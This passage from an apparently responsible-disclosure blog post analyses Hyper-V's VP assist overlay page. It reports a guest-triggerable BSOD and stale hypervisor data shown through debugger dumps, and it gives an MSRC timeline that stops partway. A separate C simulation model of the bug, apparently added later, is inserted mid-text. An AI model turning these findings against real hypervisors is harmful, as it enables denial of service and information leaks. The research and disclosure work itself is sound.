It is a feature of the hypervisor overlay page (or a bug).</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span style="font-size: 8pt; text-indent: 35.4pt; white-space: pre-wrap;"><br /></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span style="font-size: 8pt; text-indent: 35.4pt; white-space: pre-wrap;">According to section 5.2.1 of the Hyper-V TLFS 6.0:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span style="font-size: 8pt; text-indent: 35.4pt; white-space: pre-wrap;"><br /></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The hypervisor defines several special pages that “overlay” the guest’s GPA space. The hypercall code page is an example of an overlay page. Overlays are addressed by guest physical addresses but are not included in the normal GPA map maintained internally by the hypervisor. Conceptually, they exist in a separate map that overlays the GPA map.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">If a page within the GPA space is overlaid, any SPA page mapped to the GPA page is effectively “obscured” and generally unreachable by the virtual processor through processor memory accesses. 
Furthermore, access rights installed on the underlying GPA page are not honored when accessing an overlay page.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Let's do an experiment. Before writing the address of the buffer to the <span face="" style="font-weight: 700; text-indent: 0px;">HV_X64_MSR_VP_ASSIST_PAGE </span><span face="" style="text-indent: 0px;">msr</span>, we need to allocate it. Fill that buffer with 0x11 bytes:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="" style="background-color: transparent; color: black; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">FillBuffer((</span><span face="" style="background-color: transparent; color: 
#2b91af; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">PCHAR</span><span face="" style="background-color: transparent; color: black; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">)pHvVpPage, </span><span face="" style="background-color: transparent; color: #6f008a; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">PAGE_SIZE</span><span face="" style="background-color: transparent; color: black; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">, 0x11);</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">__writemsr(</span><span face="" style="background-color: transparent; color: #6f008a; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">HV_X64_MSR_APIC_ASSIST_PAGE</span><span face="" style="background-color: transparent; color: black; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">, guestPFN.AsUINT64);</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: 
pre-wrap;"><br /></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><span style="font-size: 8pt; text-align: left; text-indent: 35.4pt; white-space: pre-wrap;">and see its content in LiveCloudKd (we know the physical and virtual addresses from a standard WinDBG session launched in source-mode debugging):</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; overflow: hidden;"><img height="85" src="https://lh6.googleusercontent.com/_eAsytllqD37lUVSYV9FDmIYKwtBKCXE7_rJG0oenMH8xHmkczc4yKg-pYJDHhi6csbJgJu7WAlYvf2REQeM7EyoJGCGM0hiXtbpGUugtgkdnxkG_AOPN6zAgP3nqFn4zIsx5vGZFE9lq-k-_Q" style="margin-left: 0px; margin-top: 0px;" width="464" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Attaching to the guest OS with a standard kernel debugger:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; 
font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; overflow: hidden;"><img height="260" src="https://lh5.googleusercontent.com/K2XExoniultrDyPsrVHUMMo7Tx_0VP2ZOeERiPMaU1pco2pHHzn5vLYHYHlvSm9jelLW558Hu1fxgEFzQrcP0Cy2otLPftgFqOf_W3xO8MIKxSYbff4uvB7GgdIeeIXkPLpV2ciIslXPtKnIQA" style="margin-left: 0px; margin-top: 0px;" width="526" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Attach LiveCloudKd to the same VM at the same time. First, we can see the enlightenment structure; some values are set in CurrentNestedVmcs and EnlightenVmEntry:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; overflow: hidden;"><img height="143" src="https://lh4.googleusercontent.com/m5ZH8GhZP0i4POJYQKVoCkq4_bOYLRT5Quotz1IzdO9EWpbLVk_lBez6nU3vsKR2lg6p6Hd1AIwtRh_8-ej6hlgP66WyhtBCbNAiZ1E4jFojuz-CAQMic5CMJ_xYhgtyUD-yX-hqS5UkZh2xLw" style="margin-left: 0px; margin-top: 0px;" width="335" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" 
style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">And the same values appear in the VP Assist Page (at the same address the standard debugger showed):</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; overflow: hidden;"><img height="196" src="https://lh4.googleusercontent.com/86GWnqlREA5cuR2Ai8jJ8dI1lJLDOVQyAqG2kqp30SgsKiIXzfMSWA0MuN5l5W5sp6xaTUt6oUZbmr8VW2g6TVj_rGR8Gmdcowup8U2KXqABl3uJ7q3UGyvCOBTaUGXiBaQeHG2sKDaqVyWRmw" style="margin-left: 0px; margin-top: 0px;" width="346" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">After writing to the </span><span face="" style="font-size: 10.6667px; font-weight: 700; white-space: pre-wrap;">HV_X64_MSR_VP_ASSIST_PAGE</span><span style="font-size: 8pt; text-indent: 35.4pt; 
white-space: pre-wrap;"> MSR we can see some old garbage inside the hypervisor (the address of the overlay page is constant, as we saw earlier; the driver was restarted, the guest OS was not rebooted):</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">WINDBG>dps ffffe802`c561c000</span><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> – inside hypervisor</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">ffffe802`c561c000 00000000`00000000</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">ffffe802`c561c008 00000000`00000000</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">ffffe802`c561c010 
00000000`00000000</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">ffffe802`c561c018 00000000`00000000</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">ffffe802`c561c020 00000000`00000000</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">ffffe802`c561c028 00000000`00000001</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">ffffe802`c561c030 00000000`7ff23000</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">ffffe802`c561c038 00000000`00000000</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; 
white-space: pre-wrap;">ffffe802`c561c040 00000000`00000000</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">ffffe802`c561c048 00000000`00000000</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">ffffe802`c561c050 00000000`00000000</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">ffffe802`c561c058 00000000`00000000</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Back in the guest OS debugger: 
yes, the 0x11 values in the overlay page were replaced by garbage values from the last <span face="" style="font-weight: 700; text-indent: 47.2px;">HV_X64_MSR_VP_ASSIST_PAGE</span><span face="" style="color: black; font-size: 8pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-indent: 0px; vertical-align: baseline;"> MSR write</span>:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; overflow: hidden;"><img height="268" src="https://lh6.googleusercontent.com/JVg9O8fpm-hXjUHzSD3-Lg9kEdO7q8k-xuN4eQm8Ca-FdiB3pck2ldDJnk_BvUvF7JfNbchTcYV83dBh4n1_8GUa83k8m4QYBipgEmmUTK6D29jg9zKtOcyVgVP2Q4nYN7o7GQ7M4B-GvKVOxw" style="margin-left: 0px; margin-top: 0px;" width="440" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><br /></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-size: 10.6667px; white-space: pre-wrap;">If we write something to the overlay page after writing its address to the </span><span face="" style="font-size: 10.6667px; font-weight: 700; text-indent: 47.2px; white-space: pre-wrap;">HV_X64_MSR_VP_ASSIST_PAGE</span><span style="font-size: 10.6667px; white-space: pre-wrap;"> MSR, everything is correct:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: 
normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; overflow: hidden;"><img height="315" src="https://lh6.googleusercontent.com/2aoazJM7Pl8I9t8Cbgqc3_4D46gJ1SbiOCWeb8NyDbGw6bCni8XPdOsxH9Rt9DHzbvxRdZlrieio75aHjKn5Yy2Ih6ee_tdI7jQL8Agxo65m7H7ZJY8kmIsdin4xv648oG4hzsTK_hRZ-4k9tA" style="margin-left: 0px; margin-top: 0px;" width="412" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">LiveCloudKd shows the old values because it parses the original contents of guest memory, which is mapped into the host OS using an MDL and the host-PFN-to-guest-PFN page map. The overlay page is stored inside the hypervisor and is substituted whenever the guest OS reads or writes memory in that range. 
Interestingly, the page attributes of the guest page are not changed.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">What I checked: the overlay page </span><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">ffffe802`c561c000</span><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> inside the hypervisor constantly changes CR3, but its physical address doesn’t change. Probably this needs additional investigation (but it is not bug-related research). 
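To make this overlay behaviour concrete, here is an added C model (not code from this post, from the driver above, or from Hyper-V itself) that replays the experiment: guest accesses to the enabled assist page are redirected to a hypervisor-private buffer, a host-side reader such as LiveCloudKd sees the raw guest page, and the unpatched MSR handler leaves the previous owner's contents in the buffer. The MSR bit layout (bit 0 Enable, bits 63:12 PFN), the page numbers, and the clear-on-enable fix are assumptions of the model.

```c
#include <stdbool.h>
#include <stdint.h>
#include <string.h>

#define PAGE_SIZE 4096u
#define NUM_PAGES 8u

typedef struct { uint8_t ram[NUM_PAGES][PAGE_SIZE]; } guest_t;   /* guest-physical RAM */

/* Hypervisor-side state: one private overlay buffer for the VP plus the MSR.
 * Assumed MSR layout (model): bit 0 = Enable, bits 63:12 = guest PFN. */
typedef struct {
    uint8_t  overlay[PAGE_SIZE];
    uint64_t msr_vp_assist;
    bool     patched;   /* false = behaviour described in the post, true = fixed model */
} hv_t;

static bool overlay_covers(const hv_t *hv, uint64_t gpa)
{
    return (hv->msr_vp_assist & 1u) && (hv->msr_vp_assist >> 12) == gpa / PAGE_SIZE;
}

/* Guest-side access: the hypervisor substitutes its overlay buffer for any
 * access inside the enabled VP assist page; the backing RAM page is untouched. */
static uint8_t *guest_ptr(hv_t *hv, guest_t *g, uint64_t gpa)
{
    if (overlay_covers(hv, gpa))
        return hv->overlay + gpa % PAGE_SIZE;
    return &g->ram[gpa / PAGE_SIZE][gpa % PAGE_SIZE];
}

void guest_write(hv_t *hv, guest_t *g, uint64_t gpa, const void *src, size_t n)
{
    memcpy(guest_ptr(hv, g, gpa), src, n);   /* caller stays within one page */
}

uint8_t guest_read8(hv_t *hv, guest_t *g, uint64_t gpa) { return *guest_ptr(hv, g, gpa); }

/* Host-side read, the way a tool that maps guest RAM directly (LiveCloudKd via
 * an MDL and the host-PFN-to-guest-PFN map) sees it: never through the overlay. */
uint8_t host_read8(const guest_t *g, uint64_t gpa)
{
    return g->ram[gpa / PAGE_SIZE][gpa % PAGE_SIZE];
}

/* MSR write handler. Unpatched: only retarget the overlay, so whatever the
 * hypervisor left there for the previous owner shows up at the new page.
 * Patched (the model's choice of fix): clear the overlay on every enable. */
void hv_write_msr_vp_assist(hv_t *hv, uint64_t value)
{
    hv->msr_vp_assist = value;
    if (hv->patched && (value & 1u))
        memset(hv->overlay, 0, PAGE_SIZE);
}

typedef struct {
    uint8_t guest_after_enable;   /* guest read of +0x28 right after the MSR write */
    uint8_t host_after_enable;    /* host read of the same GPA */
    uint8_t guest_after_write;    /* guest read after a post-enable write of 0x22 */
    uint8_t host_after_write;     /* host read after that write */
} experiment_t;

/* Replays the sequence from the post. Offsets 0x28/0x30 and the values 1 and
 * 0x7ff23000 are taken from the dps dump above; page numbers 3 and 5 are constructed. */
experiment_t run_experiment(bool patched)
{
    static guest_t g;
    hv_t hv;
    experiment_t r;
    const uint64_t old_gpa = 3ull * PAGE_SIZE, new_gpa = 5ull * PAGE_SIZE;
    const uint64_t one = 1, stale = 0x7ff23000ull;
    uint8_t pattern[PAGE_SIZE], v = 0x22;
    memset(&g, 0, sizeof g);
    memset(&hv, 0, sizeof hv);
    hv.patched = patched;

    /* 1. First driver load: enable the assist page at old_gpa; the hypervisor
     *    then records its own state in the overlay (the non-zero qwords above). */
    hv_write_msr_vp_assist(&hv, old_gpa | 1u);
    memcpy(hv.overlay + 0x28, &one, sizeof one);
    memcpy(hv.overlay + 0x30, &stale, sizeof stale);
    /* 2. Driver unload: MSR cleared; the overlay buffer keeps its contents. */
    hv_write_msr_vp_assist(&hv, 0);

    /* 3. Driver restart: memset(page, 0x11) BEFORE the MSR write lands in plain
     *    guest RAM (no overlay yet), then the page is enabled. */
    memset(pattern, 0x11, sizeof pattern);
    guest_write(&hv, &g, new_gpa, pattern, sizeof pattern);
    hv_write_msr_vp_assist(&hv, new_gpa | 1u);
    r.guest_after_enable = guest_read8(&hv, &g, new_gpa + 0x28);
    r.host_after_enable  = host_read8(&g, new_gpa + 0x28);

    /* 4. A write made AFTER the MSR write goes to the overlay and reads back. */
    guest_write(&hv, &g, new_gpa + 0x28, &v, 1);
    r.guest_after_write = guest_read8(&hv, &g, new_gpa + 0x28);
    r.host_after_write  = host_read8(&g, new_gpa + 0x28);
    return r;
}
```

In the unpatched run the guest reads 0x01 at offset 0x28 right after enabling while the host-side view still shows 0x11; in the patched run the guest reads 0x00, and in both runs a write made after the MSR write is visible to the guest but not to the host-side reader.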
</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Conclusion: two bugs were found:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span></p><ul style="margin-bottom: 0px; margin-top: 0px;"><li dir="ltr" style="background-color: transparent; color: black; font-family: calibri, sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; list-style-type: disc; margin-left: 17.4pt; text-decoration: none; vertical-align: baseline;"><p dir="ltr" role="presentation" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Incorrect handling of <span style="font-family: "Times New Roman";">VP Assist Page</span> values during </span><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><b>vmlaunch</b></span><span face="" 
style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> emulation, which causes a null pointer dereference and then a BSOD.</span></p></li><li dir="ltr" style="background-color: transparent; color: black; font-family: calibri, sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; list-style-type: disc; margin-left: 17.4pt; text-decoration: none; vertical-align: baseline;"><p dir="ltr" role="presentation" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Incorrect handling of overlay page initialization. It simply switches to another memory buffer without clearing the old values stored inside the hypervisor, or copying the values from the guest page whose address was written to the </span><span style="font-weight: 700; text-indent: 47.2px; white-space: pre-wrap;">HV_X64_MSR_VP_ASSIST_PAGE</span><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> MSR. 
</span></p></li></ul><div><span style="font-family: calibri, sans-serif;"><span style="font-size: 10.6667px; white-space: pre-wrap;"><br /></span></span></div><div><span style="font-family: calibri, sans-serif;"><span style="font-size: 10.6667px; white-space: pre-wrap;"><span> </span><span> </span><span> </span><span> </span><span> </span>Patch is simple:</span></span></div><div><span style="font-family: calibri, sans-serif;"><span style="font-size: 10.6667px; white-space: pre-wrap;"><br /></span></span></div><div><span style="font-family: calibri, sans-serif;"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHfeV6iUnP6HW1i3lh9cfsv307WPZt3g003rhSbpUHHPnOpVA6Jy0vVgW4CNVLdg0gUrZ1zxsGw_PYvBKLxx4DvtGmgqM6GllJKDV4jj0lDOl3zzHXXDT4sWqjPCFvMzthjq3OrlZPMEXL/s1936/compare.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1437" data-original-width="1936" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHfeV6iUnP6HW1i3lh9cfsv307WPZt3g003rhSbpUHHPnOpVA6Jy0vVgW4CNVLdg0gUrZ1zxsGw_PYvBKLxx4DvtGmgqM6GllJKDV4jj0lDOl3zzHXXDT4sWqjPCFvMzthjq3OrlZPMEXL/s320/compare.png" width="320" /></a></div><br /><span style="font-size: 10.6667px; white-space: pre-wrap;"><br /></span></span></div><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">MSRC communications history:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; 
font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">21 August 2020 – first submission was opened but then rejected, because the attachment was blocked on some mail server.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">21 August 2020 – second submission was opened.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">22 August 2020 – a case for the second submission was opened.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">24 August 2020 – the DoS behavior of the PoC was confirmed.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; 